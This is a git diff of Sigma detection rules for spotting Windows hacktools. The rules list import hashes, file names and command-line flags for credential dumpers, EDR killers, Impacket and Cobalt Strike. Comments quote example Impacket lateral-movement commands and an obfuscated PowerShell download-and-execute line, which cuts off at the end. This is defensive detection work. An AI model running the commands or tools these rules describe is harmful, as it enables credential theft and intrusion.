3a19059bd7688cb88e70005f18efc439 # PetitPotam + - bf6223a49e45d99094406777eb6004ba # PetitPotam + - 23867a89c2b8fc733be6cf5ef902f2d1 # JuicyPotato + - a37ff327f8d48e8a4d2f757e1b6e70bc # JuicyPotato + - f9a28c458284584a93b14216308d31bd # JuicyPotatoNG + - 6118619783fc175bc7ebecff0769b46e # RoguePotato + - 959a83047e80ab68b368fdb3f4c6e4ea # RoguePotato + - 563233bfa169acc7892451f71ad5850a # RoguePotato + - 87575cb7a0e0700eb37f2e3668671a08 # RoguePotato + - 13f08707f759af6003837a150a371ba1 # Pwdump + - 1781f06048a7e58b323f0b9259be798b # Pwdump + - 233f85f2d4bc9d6521a6caae11a1e7f5 # Pwdump + - 24af2584cbf4d60bbe5c6d1b31b3be6d # Pwdump + - 632969ddf6dbf4e0f53424b75e4b91f2 # Pwdump + - 713c29b396b907ed71a72482759ed757 # Pwdump + - 749a7bb1f0b4c4455949c0b2bf7f9e9f # Pwdump + - 8628b2608957a6b0c6330ac3de28ce2e # Pwdump + - 8b114550386e31895dfab371e741123d # Pwdump + - 94cb940a1a6b65bed4d5a8f849ce9793 # PwDumpX + - 9d68781980370e00e0bd939ee5e6c141 # Pwdump + - b18a1401ff8f444056d29450fbc0a6ce # Pwdump + - cb567f9498452721d77a451374955f5f # Pwdump + - 730073214094cd328547bf1f72289752 # Htran + - 17b461a082950fc6332228572138b80c # Cobalt Strike beacons + - dc25ee78e2ef4d36faa0badf1e7461c9 # Cobalt Strike beacons + - 819b19d53ca6736448f9325a85736792 # Cobalt Strike beacons + - 829da329ce140d873b4a8bde2cbfaa7e # Cobalt Strike beacons + - c547f2e66061a8dffb6f5a3ff63c0a74 # PPLDump + - 0588081ab0e63ba785938467e1b10cca # PPLDump + - 0d9ec08bac6c07d9987dfd0f1506587c # NanoDump + - bc129092b71c89b4d4c8cdf8ea590b29 # NanoDump + - 4da924cf622d039d58bce71cdf05d242 # NanoDump + - e7a3a5c377e2d29324093377d7db1c66 # NanoDump + - 9a9dbec5c62f0380b4fa5fd31deffedf # NanoDump + - af8a3976ad71e5d5fdfb67ddb8dadfce # NanoDump + - 0c477898bbf137bbd6f2a54e3b805ff4 # NanoDump + - 0ca9f02b537bcea20d4ea5eb1a9fe338 # NanoDump + - 3ab3655e5a14d4eefc547f4781bf7f9e # NanoDump + - e6f9d5152da699934b30daab206471f6 # NanoDump + - 3ad59991ccf1d67339b319b15a41b35d # NanoDump + - ffdd59e0318b85a3e480874d9796d872 # NanoDump + - 0cf479628d7cc1ea25ec7998a92f5051 # NanoDump + - 07a2d4dcbd6cb2c6a45e6b101f0b6d51 # NanoDump + - d6d0f80386e1380d05cb78e871bc72b1 # NanoDump + - 38d9e015591bbfd4929e0d0f47fa0055 # HandleKatz + - 0e2216679ca6e1094d63322e3412d650 # HandleKatz + - ada161bf41b8e5e9132858cb54cab5fb # DripLoader + - 2a1bc4913cd5ecb0434df07cb675b798 # DripLoader + - 11083e75553baae21dc89ce8f9a195e4 # DripLoader + - a23d29c9e566f2fa8ffbb79267f5df80 # DripLoader + - 4a07f944a83e8a7c2525efa35dd30e2f # CreateMiniDump + - 767637c23bb42cd5d7397cf58b0be688 # UACMe Akagi + - 14c4e4c72ba075e9069ee67f39188ad8 # UACMe Akagi + - 3c782813d4afce07bbfc5a9772acdbdc # UACMe Akagi + - 7d010c6bb6a3726f327f7e239166d127 # UACMe Akagi + - 89159ba4dd04e4ce5559f132a9964eb3 # UACMe Akagi + - 6f33f4a5fc42b8cec7314947bd13f30f # UACMe Akagi + - 5834ed4291bdeb928270428ebbaf7604 # UACMe Akagi + - 5a8a8a43f25485e7ee1b201edcbc7a38 # UACMe Akagi + - dc7d30b90b2d8abf664fbed2b1b59894 # UACMe Akagi + - 41923ea1f824fe63ea5beb84db7a3e74 # UACMe Akagi + - 3de09703c8e79ed2ca3f01074719906b # UACMe Akagi + - a53a02b997935fd8eedcb5f7abab9b9f # WCE + - e96a73c7bf33a464c510ede582318bf2 # WCE + - 32089b8851bbf8bc2d014e9f37288c83 # Sliver Stagers + - 09D278F9DE118EF09163C6140255C690 # Dumpert + - 03866661686829d806989e2fc5a72606 # Dumpert + - e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - 84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - 19584675d94829987952432e018d5056 # SysmonQuiet + - 330768a4f172e10acb6287b87289d83b # ShaprEvtMute Hook + - 885c99ccfbe77d1cbfcb9c4e7c1a3313 # Forkatz + - 22a22bc9e4e0d2f189f1ea01748816ac # PPLKiller + - 7fa30e6bb7e8e8a69155636e50bf1b28 # PPLKiller + - 96df3a3731912449521f6f8d183279b1 # Backstab + - 7e6cf3ff4576581271ac8a313b2aab46 # Backstab + - 51791678f351c03a0eb4e2a7b05c6e17 # Backstab + - 25ce42b079282632708fc846129e98a5 # Forensia + - 021bcca20ba3381b11bdde26b4e62f20 # EDRSandBlast + - 59223b5f52d8799d38e0754855cbdf42 # EDRSandBlast + - 81e75d8f1d276c156653d3d8813e4a43 # EDRSandBlast + - 17244e8b6b8227e57fe709ccad421420 # EDRSandBlast + - 5b76da3acdedc8a5cdf23a798b5936b4 # EDRSandBlast + - cb2b65bb77d995cc1c0e5df1c860133c # EDRSandBlast + - 40445337761d80cf465136fafb1f63e6 # EDRSandBlast + - 8a790f401b29fa87bc1e56f7272b3aa6 # EDRSilencer + - Hashes|contains: # Sysmon field hashes contains all types + - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam + - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam + - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam + - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato + - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato + - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG + - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato + - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato + - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato + - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato + - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump + - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump + - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump + - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump + - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump + - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump + - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump + - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump + - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump + - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX + - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump + - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump + - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump + - IMPHASH=730073214094CD328547BF1F72289752 # Htran + - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons + - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons + - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons + - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons + - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump + - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump + - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump + - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump + - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump + - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump + - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump + - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump + - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump + - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump + - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump + - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump + - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump + - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump + - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump + - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump + - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz + - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz + - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader + - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader + - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader + - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader + - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump + - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi + - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi + - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi + - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi + - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi + - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi + - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi + - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi + - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi + - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi + - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi + - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE + - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE + - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers + - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert + - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert + - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert + - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte + - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet + - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook + - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz + - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller + - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller + - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab + - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab + - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab + - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia + - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast + - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast + - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast + - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast + - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast + - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast + - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast + - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer condition: process_creation and selection falsepositives: - Legitimate use of one of these tools diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml index fd5f92985..3561dc062 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_execution_via_pe_metadata.yml @@ -1,8 +1,7 @@ title: Hacktool Execution - PE Metadata id: 37c1333a-a0db-48be-b64b-7393b2386e3b status: test -description: Detects the execution of different Windows based hacktools via PE metadata - (company, product, etc.) even if the files have been renamed +description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed references: - https://github.com/cube0x0 - https://www.virustotal.com/gui/search/metadata%253ACube0x0/files @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - Company: Cube0x0 + Company: Cube0x0 # Detects the use of tools created by a well-known hacktool producer named "Cube0x0", which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec, etc.) condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml index a1ec75c64..dd8294244 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_gmer.yml @@ -25,9 +25,9 @@ detection: - SHA1=539C228B6B332F5AA523E5CE358C16647D8BBE57 - SHA256=E8A3E804A96C716A3E9B69195DB6FFB0D33E2433AF871E4D4E1EAB3097237173 selection_other: - - md5: e9dc058440d321aa17d0600b3ca0ab04 - - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57 - - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 + - md5: e9dc058440d321aa17d0600b3ca0ab04 + - sha1: 539c228b6b332f5aa523e5ce358c16647d8bbe57 + - sha256: e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173 condition: process_creation and (1 of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml index b59ee9016..f3d4d141e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_handlekatz.yml @@ -1,8 +1,7 @@ title: HackTool - HandleKatz LSASS Dumper Execution id: ca621ba5-54ab-4035-9942-d378e6fcde3c status: test -description: Detects the use of HandleKatz, a tool that demonstrates the usage of - cloned handles to Lsass in order to create an obfuscated memory dump of the same +description: Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same references: - https://github.com/codewhitesec/HandleKatz author: Florian Roth (Nextron Systems) @@ -21,19 +20,19 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_loader_img: Image|endswith: \loader.exe - CommandLine|contains: '--pid:' + CommandLine|contains: '--pid:' selection_loader_imphash: - - Imphash: - - 38d9e015591bbfd4929e0d0f47fa0055 - - 0e2216679ca6e1094d63322e3412d650 - - Hashes: - - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 - - IMPHASH=0E2216679CA6E1094D63322E3412D650 + - Imphash: + - 38d9e015591bbfd4929e0d0f47fa0055 + - 0e2216679ca6e1094d63322e3412d650 + - Hashes: + - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 + - IMPHASH=0E2216679CA6E1094D63322E3412D650 selection_flags: - CommandLine|contains|all: + CommandLine|contains|all: - '--pid:' - '--outfile:' - CommandLine|contains: + CommandLine|contains: - .dmp - lsass - .obf diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml index ef2331aae..9c5a1483e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_hashcat.yml @@ -1,8 +1,7 @@ title: HackTool - Hashcat Password Cracker Execution id: 39b31e81-5f5f-4898-9c0e-2160cfc0f9bf status: test -description: Execute Hashcat.exe with provided SAM file from registry of Windows and - Password list to crack against +description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat - https://hashcat.net/wiki/doku.php?id=hashcat @@ -23,7 +22,7 @@ detection: selection_img: Image|endswith: \hashcat.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - '-a ' - '-m 1000 ' - '-r ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml index a68921606..b4e0ec887 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml @@ -1,8 +1,7 @@ title: HackTool - Htran/NATBypass Execution id: f5e3b62f-e577-4e59-931e-0a15b2b94e1e status: test -description: Detects executable names or flags used by Htran or Htran-like tools (e.g. - NATBypass) +description: Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass) references: - https://github.com/HiwinCN/HTran - https://github.com/cw1997/NATBypass @@ -26,7 +25,7 @@ detection: - \htran.exe - \lcx.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '.exe -tran ' - '.exe -slave ' condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml index 6ff87780b..645d04d0a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_hydra.yml @@ -1,8 +1,7 @@ title: HackTool - Hydra Password Bruteforce Execution id: aaafa146-074c-11eb-adc1-0242ac120002 status: test -description: Detects command line parameters used by Hydra password guessing hack - tool +description: Detects command line parameters used by Hydra password guessing hack tool references: - https://github.com/vanhauser-thc/thc-hydra author: Vasiliy Burov @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-u ' - '-p ' - CommandLine|contains: + CommandLine|contains: - ^USER^ - ^PASS^ condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml index cb8d98675..e2e22a380 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_lateral_movement.yml @@ -1,8 +1,8 @@ title: HackTool - Potential Impacket Lateral Movement Activity id: 10c14723-61c7-4c75-92ca-9af245723ad2 related: - - id: e31f89f7-36fb-4697-8ab6-48823708353b - type: obsoletes + - id: e31f89f7-36fb-4697-8ab6-48823708353b + type: obsoletes status: stable description: Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework references: @@ -28,12 +28,29 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_other: + # *** wmiexec.py + # parent is wmiprvse.exe + # examples: + # cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 + # cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 + # *** dcomexec.py -object MMC20 + # parent is mmc.exe + # example: + # "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567442499.05 2>&1 + # *** dcomexec.py -object ShellBrowserWindow + # runs %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} but parent command is explorer.exe + # example: + # "C:\Windows\System32\cmd.exe" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1567520103.71 2>&1 + # *** smbexec.py + # parent is services.exe + # example: + # C:\Windows\system32\cmd.exe /Q /c echo tasklist ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat ParentImage|endswith: - - \wmiprvse.exe - - \mmc.exe - - \explorer.exe - - \services.exe - CommandLine|contains|all: + - \wmiprvse.exe # wmiexec + - \mmc.exe # dcomexec MMC + - \explorer.exe # dcomexec ShellBrowserWindow + - \services.exe # smbexec + CommandLine|contains|all: - cmd.exe - /Q - /c @@ -41,9 +58,10 @@ detection: - '&1' selection_atexec: ParentCommandLine|contains: - - svchost.exe -k netsvcs - - taskeng.exe - CommandLine|contains|all: + - svchost.exe -k netsvcs # atexec on win10 (parent is "C:\Windows\system32\svchost.exe -k netsvcs") + - taskeng.exe # atexec on win7 (parent is "taskeng.exe {AFA79333-694C-4BEE-910E-E57D9A3518F6} S-1-5-18:NT AUTHORITY\System:Service:") + # cmd.exe /C tasklist /m > C:\Windows\Temp\bAJrYQtL.tmp 2>&1 + CommandLine|contains|all: - cmd.exe - /C - Windows\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml index 96b7a7028..8ef2a5f82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_impacket_tools.yml @@ -1,8 +1,7 @@ title: HackTool - Impacket Tools Execution id: 4627c6ae-6899-46e2-aa0c-6ebcb1becd19 status: test -description: Detects the execution of different compiled Windows binaries of the impacket - toolset (based on names or part of their names - could lead to false positives) +description: Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives) references: - https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.21-dev-binaries author: Florian Roth (Nextron Systems) @@ -20,43 +19,58 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|contains: - - \goldenPac - - \karmaSMB - - \kintercept - - \ntlmrelayx - - \rpcdump - - \samrdump - - \secretsdump - - \smbexec - - \smbrelayx - - \wmiexec - - \wmipersist - - Image|endswith: - - \atexec_windows.exe - - \dcomexec_windows.exe - - \dpapi_windows.exe - - \findDelegation_windows.exe - - \GetADUsers_windows.exe - - \GetNPUsers_windows.exe - - \getPac_windows.exe - - \getST_windows.exe - - \getTGT_windows.exe - - \GetUserSPNs_windows.exe - - \ifmap_windows.exe - - \mimikatz_windows.exe - - \netview_windows.exe - - \nmapAnswerMachine_windows.exe - - \opdump_windows.exe - - \psexec_windows.exe - - \rdp_check_windows.exe - - \sambaPipe_windows.exe - - \smbclient_windows.exe - - \smbserver_windows.exe - - \sniff_windows.exe - - \sniffer_windows.exe - - \split_windows.exe - - \ticketer_windows.exe + - Image|contains: + - \goldenPac + - \karmaSMB + - \kintercept + - \ntlmrelayx + - \rpcdump + - \samrdump + - \secretsdump + - \smbexec + - \smbrelayx + - \wmiexec + - \wmipersist + - Image|endswith: + - \atexec_windows.exe + - \dcomexec_windows.exe + - \dpapi_windows.exe + - \findDelegation_windows.exe + - \GetADUsers_windows.exe + - \GetNPUsers_windows.exe + - \getPac_windows.exe + - \getST_windows.exe + - \getTGT_windows.exe + - \GetUserSPNs_windows.exe + - \ifmap_windows.exe + - \mimikatz_windows.exe + - \netview_windows.exe + - \nmapAnswerMachine_windows.exe + - \opdump_windows.exe + - \psexec_windows.exe + - \rdp_check_windows.exe + - \sambaPipe_windows.exe + - \smbclient_windows.exe + - \smbserver_windows.exe + - \sniff_windows.exe + - \sniffer_windows.exe + - \split_windows.exe + - \ticketer_windows.exe + # - '\addcomputer_windows.exe' + # - '\esentutl_windows.exe' + # - '\getArch_windows.exe' + # - '\lookupsid_windows.exe' + # - '\mqtt_check_windows.exe' + # - '\mssqlclient_windows.exe' + # - '\mssqlinstance_windows.exe' + # - '\ntfs-read_windows.exe' + # - '\ping_windows.exe' + # - '\ping6_windows.exe' + # - '\raiseChild_windows.exe' + # - '\reg_windows.exe' + # - '\registry-read_windows.exe' + # - '\services_windows.exe' + # - '\wmiquery_windows.exe' condition: process_creation and selection falsepositives: - Legitimate use of the impacket tools diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml index db21d6c71..d278849a5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_impersonate.yml @@ -1,8 +1,7 @@ title: HackTool - Impersonate Execution id: cf0c254b-22f1-4b2b-8221-e137b3c0af94 status: test -description: Detects execution of the Impersonate tool. Which can be used to manipulate - tokens on a Windows computers remotely (PsExec/WmiExec) or interactively +description: Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively references: - https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/ - https://github.com/sensepost/impersonate @@ -23,9 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_commandline_exe: - CommandLine|contains: impersonate.exe + CommandLine|contains: impersonate.exe selection_commandline_opt: - CommandLine|contains: + CommandLine|contains: - ' list ' - ' exec ' - ' adduser ' @@ -35,9 +34,9 @@ detection: - SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A - IMPHASH=0A358FFC1697B7A07D0E817AC740DF62 selection_hash_ext: - - md5: 9520714AB576B0ED01D1513691377D01 - - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A - - Imphash: 0A358FFC1697B7A07D0E817AC740DF62 + - md5: 9520714AB576B0ED01D1513691377D01 + - sha256: E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A + - Imphash: 0A358FFC1697B7A07D0E817AC740DF62 condition: process_creation and (all of selection_commandline_* or 1 of selection_hash_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml index 3163151f4..6bcabee5f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_inveigh.yml @@ -1,8 +1,7 @@ title: HackTool - Inveigh Execution id: b99a1518-1ad5-4f65-bc95-1ffff97a8fd0 status: test -description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle - tool +description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool references: - https://github.com/Kevin-Robertson/Inveigh - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ @@ -21,17 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Inveigh.exe - - OriginalFileName: - - \Inveigh.exe - - \Inveigh.dll - - Description: Inveigh - - CommandLine|contains: - - ' -SpooferIP' - - ' -ReplyToIPs ' - - ' -ReplyToDomains ' - - ' -ReplyToMACs ' - - ' -SnifferIP' + - Image|endswith: \Inveigh.exe + - OriginalFileName: + - \Inveigh.exe + - \Inveigh.dll + - Description: Inveigh + - CommandLine|contains: + - ' -SpooferIP' + - ' -ReplyToIPs ' + - ' -ReplyToDomains ' + - ' -ReplyToMACs ' + - ' -SnifferIP' condition: process_creation and selection falsepositives: - Very unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml index fa4622b1d..76aa2b1ad 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml @@ -3,7 +3,7 @@ id: b222df08-0e07-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/11/17 @@ -21,12 +21,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # CommandLine|re: '.*cmd.{0,5}(?:\/c|\/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\\"\{\d\}.+\-f.+\"' + # Example 1: Cmd /c" echo/Invoke-Expression (New-Object Net.WebClient).DownloadString |cLiP&& POWerSheLl -Nolog -sT . (\"{1}{2}{0}\"-f'pe','Ad',(\"{1}{0}\" -f'Ty','d-' ) ) -Assemb ( \"{5}{1}{3}{0}{2}{4}\" -f'ows','y','.F',(\"{0}{1}{2}\" -f'stem.W','i','nd'),( \"{0}{1}\"-f 'o','rms' ),'S' ) ; ([SySTEM.wiNDows.FoRmS.CLiPbOArd]::( \"{1}{0}\" -f (\"{1}{0}\" -f'T','TTeX' ),'gE' ).\"invO`Ke\"( ) ) ^| ^&( 